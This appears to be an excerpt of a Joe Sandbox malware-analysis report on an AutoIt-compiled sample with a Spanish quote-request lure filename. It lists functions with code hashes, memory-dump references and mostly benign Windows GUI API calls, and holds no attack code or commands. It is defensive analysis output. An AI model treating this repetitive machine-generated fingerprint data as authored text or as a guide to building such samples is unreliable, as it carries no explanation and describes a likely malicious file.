Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 6144aff7cb5cfcee4890abafac4d36b27463aa07c097e35cb4e8ebba113544a9
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 9151567163D7377ADB388DE8B85E7BE23899B02300F180519E982D7282C655DEB1E753

Function 00272046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&-, xrefs: 00272053

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: 0&-
API String ID: 0-1563157459
Opcode ID: 81dcc3ff8be4a5839db5bb3295c1243a7c2a539f5e23ba7f5f729f886139721e
Instruction ID: 5c7f4188d48a7cb3050ba8a27221ec6e62fa0b4eedebabcf83104e7b67812cee
Opcode Fuzzy Hash: 81dcc3ff8be4a5839db5bb3295c1243a7c2a539f5e23ba7f5f729f886139721e
Instruction Fuzzy Hash: 6E2196326216118BDB28CF79D81267A73E5A764310F198A2EE4A7C37D0DE35AD08CB90

Function 00236DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 535fbc71ca8415ee94fb6bdd6aa4220f0243e7796c943db3924fa4baa74ffea0
Instruction ID: 3b3579c17e7b9577025c8fff1b9cdb877a185b3b5f4f8b5150c2e8e63e1afc65
Opcode Fuzzy Hash: 535fbc71ca8415ee94fb6bdd6aa4220f0243e7796c943db3924fa4baa74ffea0
Instruction Fuzzy Hash: 083214A1D39F018EDB239638D926335A649AFB73C5F15C737E81AB5DA6EF29C4834100

Function 0021CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5956f5abd842e8f9f75d7addfe4be7970914f353435c64862c0b541b8bb791f
Instruction ID: 0228424eedf97e14405bb6d9e0b5d9d0255434fa95b1baf6c04aaea86b2cfa42
Opcode Fuzzy Hash: f5956f5abd842e8f9f75d7addfe4be7970914f353435c64862c0b541b8bb791f
Instruction Fuzzy Hash: CC32E635A3430A8FCF24CE68C4946BD7BE1EB85316F388567DC4997291F230DDA9DA48

Function 00207920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d0b64faa848f53d153affd49eaeeddccc20c11e6fa59c826073da6f4eae03c
Instruction ID: b97c11a3ecfb4e6101cc6964f2cb0397c085f21b144f3f0752ffbbff4a8ac62b
Opcode Fuzzy Hash: 51d0b64faa848f53d153affd49eaeeddccc20c11e6fa59c826073da6f4eae03c
Instruction Fuzzy Hash: 8522D270E2061ADFDF18CF64D881AAEB7F5FF48300F144569E852A7292EB75AD60CB50

Function 002091C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3767d7cabefd4d4de2dee9879c7178ccf6a661f69f9f6be1064728b1e261b092
Instruction ID: 021a48e6260d5bfa758b14a930e83a828341272bad3f999da1dc6cd5f2d243cc
Opcode Fuzzy Hash: 3767d7cabefd4d4de2dee9879c7178ccf6a661f69f9f6be1064728b1e261b092
Instruction Fuzzy Hash: BE02D7B0E20216EFDF04DF54D981AAEB7B5FF54300F118169E8169B291EB71AA70CF81

Function 00221C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 899cef7209ab897750f7dc496b8e619ec1108479a37621ad419802244a44f070
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: EE919A725280B35ADB2D4ABDA53483EFFE15A623A131A079ED4F2CB1C5FE14C974D620

Function 002219B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 96a177e45dda001515ada277d0e6c5f0e272d10ae9495c4f775d0fca0e227d9b
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: C59197722290F359DB2D4ABAA57483DFFF15AA23A131A07AED4F2CA1C1FD14C574D620

Function 00227A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bbed87b89ea7335b48e9b5d599a55c520fef5b8c9e6a0d86f44881fcc99b40e
Instruction ID: 7161a305cfb10834d3a10b5ccc49c4b11c7f10ca4ceeebf37f373a72d25edeb1
Opcode Fuzzy Hash: 3bbed87b89ea7335b48e9b5d599a55c520fef5b8c9e6a0d86f44881fcc99b40e
Instruction Fuzzy Hash: 7361673123C33BB6DE389DE8B895BBE2394EF41318F10091AF842CB291DA55DE728715

Function 00221706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: cce3cd50c4cb47b266466a901af235747817fbf257f83a280e059eeafad34f06
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: F28198335280B31DEB2D4AB9957483EFFE15AA23A131A079DD4F2CB1C1EE14C974D620

Function 017879A8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: bfcdd55cab5958e4efe5079f5b89433cad7fa02894178b947c729c0856312cc7
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 9941C471D1051CDBCF48CFADC991AAEFBF2AF88201F648299D516AB345D730AB41DB90

Function 01787838 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 5319e8c616a119ec30f3769f65bfc29ae476824e3e32506eeec6e05285058e42
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: DF018078A50109EFCB48EF98C5909AEF7F5FB48210F208599D81AA7305D730AE41DB80

Function 01787898 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 6f7d0b17690c0981e5233bd8f8edf85703182041f14b5c130df132eacc05ab80
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 5E018078A50209EFCB48EF98C5909AEF7B5FB48210F208599D81AA7345D730AE42DB80

Function 017861C8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00282ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00282B30
DeleteObject.GDI32(00000000), ref: 00282B43
DestroyWindow.USER32 ref: 00282B52
GetDesktopWindow.USER32 ref: 00282B6D
GetWindowRect.USER32(00000000), ref: 00282B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00282CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00282CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282CF8
GetClientRect.USER32(00000000,?), ref: 00282D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00282D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282D80
GlobalLock.KERNEL32(00000000), ref: 00282D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282D98
GlobalUnlock.KERNEL32(00000000), ref: 00282DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282DA8
GlobalFree.KERNEL32(00000000), ref: 00282DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0029FC38,00000000), ref: 00282DDB
GlobalFree.KERNEL32(00000000), ref: 00282DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00282E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00282E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00282E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0028303F

Strings

DISPLAY, xrefs: 00282EA2
AutoIt v3, xrefs: 00282CF2
, xrefs: 00282FC5
static, xrefs: 00282D3A, 00282E91

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 708c9c3d063f1295e109d21a7d507030b666046ac76d4a7d0ded4b44e7c21004
Instruction ID: 9f0d5f537120d120c06474c330d84b27622552daa6f2ec7fb9ad17ff78d29b4e
Opcode Fuzzy Hash: 708c9c3d063f1295e109d21a7d507030b666046ac76d4a7d0ded4b44e7c21004
Instruction Fuzzy Hash: 38028875A11209EFDB14DFA4DC89EAE7BB9EF48314F108159F915AB2A1CB70AD10CF60

Function 002970D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0029712F
GetSysColorBrush.USER32(0000000F), ref: 00297160
GetSysColor.USER32(0000000F), ref: 0029716C
SetBkColor.GDI32(?,000000FF), ref: 00297186
SelectObject.GDI32(?,?), ref: 00297195
InflateRect.USER32(?,000000FF,000000FF), ref: 002971C0
GetSysColor.USER32(00000010), ref: 002971C8
CreateSolidBrush.GDI32(00000000), ref: 002971CF
FrameRect.USER32(?,?,00000000), ref: 002971DE
DeleteObject.GDI32(00000000), ref: 002971E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00297230
FillRect.USER32(?,?,?), ref: 00297262
GetWindowLongW.USER32(?,000000F0), ref: 00297284

Part of subcall function 002973E8: GetSysColor.USER32(00000012), ref: 00297421
Part of subcall function 002973E8: SetTextColor.GDI32(?,?), ref: 00297425
Part of subcall function 002973E8: GetSysColorBrush.USER32(0000000F), ref: 0029743B
Part of subcall function 002973E8: GetSysColor.USER32(0000000F), ref: 00297446
Part of subcall function 002973E8: GetSysColor.USER32(00000011), ref: 00297463
Part of subcall function 002973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00297471
Part of subcall function 002973E8: SelectObject.GDI32(?,00000000), ref: 00297482
Part of subcall function 002973E8: SetBkColor.GDI32(?,00000000), ref: 0029748B
Part of subcall function 002973E8: SelectObject.GDI32(?,?), ref: 00297498
Part of subcall function 002973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002974B7
Part of subcall function 002973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002974CE
Part of subcall function 002973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002974DB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 55edae6871bf072240714f76233db53fd8fb539827e2059803c977c90358278f
Instruction ID: 306d49d96c9f46b110fc587ac304982ac8aa5653585566d5da9949d44cc2e65d
Opcode Fuzzy Hash: 55edae6871bf072240714f76233db53fd8fb539827e2059803c977c90358278f
Instruction Fuzzy Hash: FDA19272428301AFDB009F60EC4CE5B7BA9FF89320F600A1AF966A61E1D771E954CF51

Function 00218D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00218E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00256AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00256AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00256F43

Part of subcall function 00218F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00218BE8,?,00000000,?,?,?,?,00218BBA,00000000,?), ref: 00218FC5

SendMessageW.USER32(?,00001053), ref: 00256F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00256F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00256FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00256FB7

Strings

0, xrefs: 00256DCF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 09f9ff3f95f3462f65badff6e3fa59383a48f778995f675564795a3bb350b084
Instruction ID: 6e7f7a804f3281450ac733b170aa1cc6c8fae76e64fd25e270fda6915ead160a
Opcode Fuzzy Hash: 09f9ff3f95f3462f65badff6e3fa59383a48f778995f675564795a3bb350b084
Instruction Fuzzy Hash: 6812CD30621202AFDB25CF14D89CBA5B7F5FB54302F94442AF8859B662CB31ACB5CF95

Function 00282711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0028273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0028286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002828A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002828B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00282900
GetClientRect.USER32(00000000,?), ref: 0028290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00282955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00282964
GetStockObject.GDI32(00000011), ref: 00282974
SelectObject.GDI32(00000000,00000000), ref: 00282978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00282988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00282991
DeleteDC.GDI32(00000000), ref: 0028299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002829C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002829DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00282A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00282A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00282A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00282A77
GetStockObject.GDI32(00000011), ref: 00282A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00282A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00282A97

Strings

msctls_progress32, xrefs: 00282A13
DISPLAY, xrefs: 0028295A
AutoIt v3, xrefs: 002828F8
static, xrefs: 0028294F, 00282A71

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 1b604673c0af74597684b826d20eaa6e4ebb9dabd9ab51b6e242b726bb565bf8
Instruction ID: 151616e88d5c8b074f565b57e2972f00e1864d721f9505f218909c94f6beea59
Opcode Fuzzy Hash: 1b604673c0af74597684b826d20eaa6e4ebb9dabd9ab51b6e242b726bb565bf8
Instruction Fuzzy Hash: 9CB17A75A11205BFEB14DFA8DC4AFAEBBA9EB08710F108155F914E72D1D770AD50CBA0

Function 00274ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00274AED
GetDriveTypeW.KERNEL32(?,0029CB68,?,\\.\,0029CC08), ref: 00274BCA
SetErrorMode.KERNEL32(00000000,0029CB68,?,\\.\,0029CC08), ref: 00274D36

Strings

FileBackedVirtual, xrefs: 00274CEC
RAMDisk, xrefs: 00274BF4
Unknown, xrefs: 00274BED, 00274C83
iSCSI, xrefs: 00274CC2
Fixed, xrefs: 00274C09
